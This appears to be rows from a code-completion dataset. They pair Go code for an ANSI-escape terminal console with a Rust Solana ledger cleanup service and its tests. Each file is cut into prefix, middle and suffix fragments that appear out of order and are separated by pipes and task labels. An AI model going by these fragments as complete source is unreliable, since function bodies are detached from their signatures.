func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) |
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
}
| {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
} | identifier_body |
ledger_cleanup_service.rs | //! The `ledger_cleanup_service` drops older ledger data to limit disk space usage
use solana_ledger::blockstore::Blockstore;
use solana_ledger::blockstore_db::Result as BlockstoreResult;
use solana_measure::measure::Measure;
use solana_metrics::datapoint_debug;
use solana_sdk::clock::Slot;
use std::string::ToString;
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::mpsc::{Receiver, RecvTimeoutError};
use std::sync::Arc;
use std::thread;
use std::thread::{Builder, JoinHandle};
use std::time::Duration;
// - To try and keep the RocksDB size under 400GB:
// Seeing about 1600b/shred, using 2000b/shred for margin, so 200m shreds can be stored in 400gb.
// at 5k shreds/slot at 50k tps, this is 500k slots (~5 hours).
// At idle, 60 shreds/slot this is about 4m slots (18 days)
// This is chosen to allow enough time for
// - A validator to download a snapshot from a peer and boot from it
// - To make sure that if a validator needs to reboot from its own snapshot, it has enough slots locally
// to catch back up to where it was when it stopped
pub const DEFAULT_MAX_LEDGER_SHREDS: u64 = 200_000_000;
// Allow down to 50m, or 3.5 days at idle, 1hr at 50k load, around ~100GB
pub const DEFAULT_MIN_MAX_LEDGER_SHREDS: u64 = 50_000_000;
// Check for removing slots at this interval so we don't purge too often
// and starve other blockstore users.
pub const DEFAULT_PURGE_SLOT_INTERVAL: u64 = 512;
// Remove a limited number of slots at a time, so the operation
// does not take too long and block other blockstore users.
pub const DEFAULT_PURGE_BATCH_SIZE: u64 = 256;
pub struct LedgerCleanupService {
t_cleanup: JoinHandle<()>,
}
impl LedgerCleanupService {
pub fn new(
new_root_receiver: Receiver<Slot>,
blockstore: Arc<Blockstore>,
max_ledger_shreds: u64,
exit: &Arc<AtomicBool>,
) -> Self {
info!(
"LedgerCleanupService active. Max Ledger Slots {}",
max_ledger_shreds
);
let exit = exit.clone();
let mut last_purge_slot = 0;
let t_cleanup = Builder::new()
.name("solana-ledger-cleanup".to_string())
.spawn(move || loop {
if exit.load(Ordering::Relaxed) {
break;
}
if let Err(e) = Self::cleanup_ledger(
&new_root_receiver,
&blockstore,
max_ledger_shreds,
&mut last_purge_slot,
DEFAULT_PURGE_SLOT_INTERVAL,
) {
match e {
RecvTimeoutError::Disconnected => break,
RecvTimeoutError::Timeout => (),
}
}
})
.unwrap();
Self { t_cleanup }
}
fn find_slots_to_clean(
blockstore: &Arc<Blockstore>,
root: Slot,
max_ledger_shreds: u64,
) -> (u64, Slot, Slot) |
pub fn cleanup_ledger(
new_root_receiver: &Receiver<Slot>,
blockstore: &Arc<Blockstore>,
max_ledger_shreds: u64,
last_purge_slot: &mut u64,
purge_interval: u64,
) -> Result<(), RecvTimeoutError> {
let mut root = new_root_receiver.recv_timeout(Duration::from_secs(1))?;
// Get the newest root
while let Ok(new_root) = new_root_receiver.try_recv() {
root = new_root;
}
if root - *last_purge_slot > purge_interval {
let disk_utilization_pre = blockstore.storage_size();
info!(
"purge: new root: {} last_purge: {} purge_interval: {} disk: {:?}",
root, last_purge_slot, purge_interval, disk_utilization_pre
);
*last_purge_slot = root;
let (num_shreds_to_clean, lowest_slot_to_clean, mut first_slot) =
Self::find_slots_to_clean(blockstore, root, max_ledger_shreds);
if num_shreds_to_clean > 0 {
debug!(
"cleaning up to: {} shreds: {} first: {}",
lowest_slot_to_clean, num_shreds_to_clean, first_slot
);
loop {
let current_lowest =
std::cmp::min(lowest_slot_to_clean, first_slot + DEFAULT_PURGE_BATCH_SIZE);
let mut slot_update_time = Measure::start("slot_update");
*blockstore.lowest_cleanup_slot.write().unwrap() = current_lowest;
slot_update_time.stop();
let mut clean_time = Measure::start("ledger_clean");
blockstore.purge_slots(first_slot, Some(current_lowest));
clean_time.stop();
debug!(
"ledger purge {} -> {}: {} {}",
first_slot, current_lowest, slot_update_time, clean_time
);
first_slot += DEFAULT_PURGE_BATCH_SIZE;
if current_lowest == lowest_slot_to_clean {
break;
}
thread::sleep(Duration::from_millis(500));
}
}
let disk_utilization_post = blockstore.storage_size();
Self::report_disk_metrics(disk_utilization_pre, disk_utilization_post);
}
Ok(())
}
fn report_disk_metrics(pre: BlockstoreResult<u64>, post: BlockstoreResult<u64>) {
if let (Ok(pre), Ok(post)) = (pre, post) {
datapoint_debug!(
"ledger_disk_utilization",
("disk_utilization_pre", pre as i64, i64),
("disk_utilization_post", post as i64, i64),
("disk_utilization_delta", (pre as i64 - post as i64), i64)
);
}
}
pub fn join(self) -> thread::Result<()> {
self.t_cleanup.join()
}
}
#[cfg(test)]
mod tests {
use super::*;
use solana_ledger::blockstore::make_many_slot_entries;
use solana_ledger::get_tmp_ledger_path;
use std::sync::mpsc::channel;
#[test]
fn test_cleanup() {
solana_logger::setup();
let blockstore_path = get_tmp_ledger_path!();
let blockstore = Blockstore::open(&blockstore_path).unwrap();
let (shreds, _) = make_many_slot_entries(0, 50, 5);
blockstore.insert_shreds(shreds, None, false).unwrap();
let blockstore = Arc::new(blockstore);
let (sender, receiver) = channel();
//send a signal to kill all but 5 shreds, which will be in the newest slots
let mut last_purge_slot = 0;
sender.send(50).unwrap();
LedgerCleanupService::cleanup_ledger(&receiver, &blockstore, 5, &mut last_purge_slot, 10)
.unwrap();
//check that 0-40 don't exist
blockstore
.slot_meta_iterator(0)
.unwrap()
.for_each(|(slot, _)| assert!(slot > 40));
drop(blockstore);
Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
#[test]
fn test_cleanup_speed() {
solana_logger::setup();
let blockstore_path = get_tmp_ledger_path!();
let mut blockstore = Blockstore::open(&blockstore_path).unwrap();
blockstore.set_no_compaction(true);
let blockstore = Arc::new(blockstore);
let (sender, receiver) = channel();
let mut first_insert = Measure::start("first_insert");
let initial_slots = 50;
let initial_entries = 5;
let (shreds, _) = make_many_slot_entries(0, initial_slots, initial_entries);
blockstore.insert_shreds(shreds, None, false).unwrap();
first_insert.stop();
info!("{}", first_insert);
let mut last_purge_slot = 0;
let mut slot = initial_slots;
let mut num_slots = 6;
for _ in 0..5 {
let mut insert_time = Measure::start("insert time");
let batch_size = 2;
let batches = num_slots / batch_size;
for i in 0..batches {
let (shreds, _) = make_many_slot_entries(slot + i * batch_size, batch_size, 5);
blockstore.insert_shreds(shreds, None, false).unwrap();
if i % 100 == 0 {
info!("inserting..{} of {}", i, batches);
}
}
insert_time.stop();
let mut time = Measure::start("purge time");
sender.send(slot + num_slots).unwrap();
LedgerCleanupService::cleanup_ledger(
&receiver,
&blockstore,
initial_slots,
&mut last_purge_slot,
10,
)
.unwrap();
time.stop();
info!(
"slot: {} size: {} {} {}",
slot, num_slots, insert_time, time
);
slot += num_slots;
num_slots *= 2;
}
drop(blockstore);
Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
}
| {
let mut shreds = Vec::new();
let mut iterate_time = Measure::start("iterate_time");
let mut total_shreds = 0;
let mut first_slot = 0;
for (i, (slot, meta)) in blockstore.slot_meta_iterator(0).unwrap().enumerate() {
if i == 0 {
first_slot = slot;
debug!("purge: searching from slot: {}", slot);
}
// Not exact since non-full slots will have holes
total_shreds += meta.received;
shreds.push((slot, meta.received));
if slot > root {
break;
}
}
iterate_time.stop();
info!(
"checking for ledger purge: max_shreds: {} slots: {} total_shreds: {} {}",
max_ledger_shreds,
shreds.len(),
total_shreds,
iterate_time
);
if (total_shreds as u64) < max_ledger_shreds {
return (0, 0, 0);
}
let mut cur_shreds = 0;
let mut lowest_slot_to_clean = shreds[0].0;
for (slot, num_shreds) in shreds.iter().rev() {
cur_shreds += *num_shreds as u64;
if cur_shreds > max_ledger_shreds {
lowest_slot_to_clean = *slot;
break;
}
}
(cur_shreds, lowest_slot_to_clean, first_slot)
} | identifier_body |
ledger_cleanup_service.rs | //! The `ledger_cleanup_service` drops older ledger data to limit disk space usage
use solana_ledger::blockstore::Blockstore;
use solana_ledger::blockstore_db::Result as BlockstoreResult;
use solana_measure::measure::Measure;
use solana_metrics::datapoint_debug;
use solana_sdk::clock::Slot;
use std::string::ToString;
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::mpsc::{Receiver, RecvTimeoutError};
use std::sync::Arc;
use std::thread;
use std::thread::{Builder, JoinHandle};
use std::time::Duration;
// - To try and keep the RocksDB size under 400GB:
// Seeing about 1600b/shred, using 2000b/shred for margin, so 200m shreds can be stored in 400gb.
// at 5k shreds/slot at 50k tps, this is 500k slots (~5 hours).
// At idle, 60 shreds/slot this is about 4m slots (18 days)
// This is chosen to allow enough time for
// - A validator to download a snapshot from a peer and boot from it
// - To make sure that if a validator needs to reboot from its own snapshot, it has enough slots locally
// to catch back up to where it was when it stopped
pub const DEFAULT_MAX_LEDGER_SHREDS: u64 = 200_000_000;
// Allow down to 50m, or 3.5 days at idle, 1hr at 50k load, around ~100GB
pub const DEFAULT_MIN_MAX_LEDGER_SHREDS: u64 = 50_000_000;
// Check for removing slots at this interval so we don't purge too often
// and starve other blockstore users.
pub const DEFAULT_PURGE_SLOT_INTERVAL: u64 = 512;
// Remove a limited number of slots at a time, so the operation
// does not take too long and block other blockstore users.
pub const DEFAULT_PURGE_BATCH_SIZE: u64 = 256;
pub struct LedgerCleanupService {
t_cleanup: JoinHandle<()>,
}
impl LedgerCleanupService {
pub fn new(
new_root_receiver: Receiver<Slot>,
blockstore: Arc<Blockstore>,
max_ledger_shreds: u64,
exit: &Arc<AtomicBool>,
) -> Self {
info!(
"LedgerCleanupService active. Max Ledger Slots {}",
max_ledger_shreds
);
let exit = exit.clone();
let mut last_purge_slot = 0;
let t_cleanup = Builder::new()
.name("solana-ledger-cleanup".to_string())
.spawn(move || loop {
if exit.load(Ordering::Relaxed) {
break;
}
if let Err(e) = Self::cleanup_ledger(
&new_root_receiver,
&blockstore,
max_ledger_shreds,
&mut last_purge_slot,
DEFAULT_PURGE_SLOT_INTERVAL,
) {
match e {
RecvTimeoutError::Disconnected => break,
RecvTimeoutError::Timeout => (),
}
}
})
.unwrap();
Self { t_cleanup }
}
fn find_slots_to_clean(
blockstore: &Arc<Blockstore>,
root: Slot,
max_ledger_shreds: u64,
) -> (u64, Slot, Slot) {
let mut shreds = Vec::new();
let mut iterate_time = Measure::start("iterate_time");
let mut total_shreds = 0;
let mut first_slot = 0;
for (i, (slot, meta)) in blockstore.slot_meta_iterator(0).unwrap().enumerate() {
if i == 0 {
first_slot = slot;
debug!("purge: searching from slot: {}", slot);
}
// Not exact since non-full slots will have holes
total_shreds += meta.received;
shreds.push((slot, meta.received));
if slot > root {
break;
}
}
iterate_time.stop();
info!(
"checking for ledger purge: max_shreds: {} slots: {} total_shreds: {} {}",
max_ledger_shreds,
shreds.len(),
total_shreds,
iterate_time
);
if (total_shreds as u64) < max_ledger_shreds {
return (0, 0, 0);
}
let mut cur_shreds = 0;
let mut lowest_slot_to_clean = shreds[0].0;
for (slot, num_shreds) in shreds.iter().rev() {
cur_shreds += *num_shreds as u64;
if cur_shreds > max_ledger_shreds {
lowest_slot_to_clean = *slot;
break;
}
}
(cur_shreds, lowest_slot_to_clean, first_slot)
}
pub fn cleanup_ledger(
new_root_receiver: &Receiver<Slot>,
blockstore: &Arc<Blockstore>,
max_ledger_shreds: u64,
last_purge_slot: &mut u64,
purge_interval: u64,
) -> Result<(), RecvTimeoutError> {
let mut root = new_root_receiver.recv_timeout(Duration::from_secs(1))?;
// Get the newest root
while let Ok(new_root) = new_root_receiver.try_recv() {
root = new_root;
}
if root - *last_purge_slot > purge_interval {
let disk_utilization_pre = blockstore.storage_size();
info!(
"purge: new root: {} last_purge: {} purge_interval: {} disk: {:?}",
root, last_purge_slot, purge_interval, disk_utilization_pre
);
*last_purge_slot = root;
let (num_shreds_to_clean, lowest_slot_to_clean, mut first_slot) =
Self::find_slots_to_clean(blockstore, root, max_ledger_shreds);
if num_shreds_to_clean > 0 {
debug!(
"cleaning up to: {} shreds: {} first: {}",
lowest_slot_to_clean, num_shreds_to_clean, first_slot
);
loop {
let current_lowest =
std::cmp::min(lowest_slot_to_clean, first_slot + DEFAULT_PURGE_BATCH_SIZE);
let mut slot_update_time = Measure::start("slot_update");
*blockstore.lowest_cleanup_slot.write().unwrap() = current_lowest;
slot_update_time.stop();
let mut clean_time = Measure::start("ledger_clean");
blockstore.purge_slots(first_slot, Some(current_lowest));
clean_time.stop();
debug!(
"ledger purge {} -> {}: {} {}",
first_slot, current_lowest, slot_update_time, clean_time
);
first_slot += DEFAULT_PURGE_BATCH_SIZE;
if current_lowest == lowest_slot_to_clean {
break;
}
thread::sleep(Duration::from_millis(500));
}
}
let disk_utilization_post = blockstore.storage_size();
Self::report_disk_metrics(disk_utilization_pre, disk_utilization_post);
}
Ok(())
}
fn report_disk_metrics(pre: BlockstoreResult<u64>, post: BlockstoreResult<u64>) {
if let (Ok(pre), Ok(post)) = (pre, post) {
datapoint_debug!(
"ledger_disk_utilization",
("disk_utilization_pre", pre as i64, i64),
("disk_utilization_post", post as i64, i64),
("disk_utilization_delta", (pre as i64 - post as i64), i64)
);
}
}
pub fn join(self) -> thread::Result<()> {
self.t_cleanup.join()
}
}
#[cfg(test)]
mod tests {
use super::*;
use solana_ledger::blockstore::make_many_slot_entries;
use solana_ledger::get_tmp_ledger_path;
use std::sync::mpsc::channel;
#[test]
fn | () {
solana_logger::setup();
let blockstore_path = get_tmp_ledger_path!();
let blockstore = Blockstore::open(&blockstore_path).unwrap();
let (shreds, _) = make_many_slot_entries(0, 50, 5);
blockstore.insert_shreds(shreds, None, false).unwrap();
let blockstore = Arc::new(blockstore);
let (sender, receiver) = channel();
//send a signal to kill all but 5 shreds, which will be in the newest slots
let mut last_purge_slot = 0;
sender.send(50).unwrap();
LedgerCleanupService::cleanup_ledger(&receiver, &blockstore, 5, &mut last_purge_slot, 10)
.unwrap();
//check that 0-40 don't exist
blockstore
.slot_meta_iterator(0)
.unwrap()
.for_each(|(slot, _)| assert!(slot > 40));
drop(blockstore);
Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
#[test]
fn test_cleanup_speed() {
solana_logger::setup();
let blockstore_path = get_tmp_ledger_path!();
let mut blockstore = Blockstore::open(&blockstore_path).unwrap();
blockstore.set_no_compaction(true);
let blockstore = Arc::new(blockstore);
let (sender, receiver) = channel();
let mut first_insert = Measure::start("first_insert");
let initial_slots = 50;
let initial_entries = 5;
let (shreds, _) = make_many_slot_entries(0, initial_slots, initial_entries);
blockstore.insert_shreds(shreds, None, false).unwrap();
first_insert.stop();
info!("{}", first_insert);
let mut last_purge_slot = 0;
let mut slot = initial_slots;
let mut num_slots = 6;
for _ in 0..5 {
let mut insert_time = Measure::start("insert time");
let batch_size = 2;
let batches = num_slots / batch_size;
for i in 0..batches {
let (shreds, _) = make_many_slot_entries(slot + i * batch_size, batch_size, 5);
blockstore.insert_shreds(shreds, None, false).unwrap();
if i % 100 == 0 {
info!("inserting..{} of {}", i, batches);
}
}
insert_time.stop();
let mut time = Measure::start("purge time");
sender.send(slot + num_slots).unwrap();
LedgerCleanupService::cleanup_ledger(
&receiver,
&blockstore,
initial_slots,
&mut last_purge_slot,
10,
)
.unwrap();
time.stop();
info!(
"slot: {} size: {} {} {}",
slot, num_slots, insert_time, time
);
slot += num_slots;
num_slots *= 2;
}
drop(blockstore);
Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
}
| test_cleanup | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.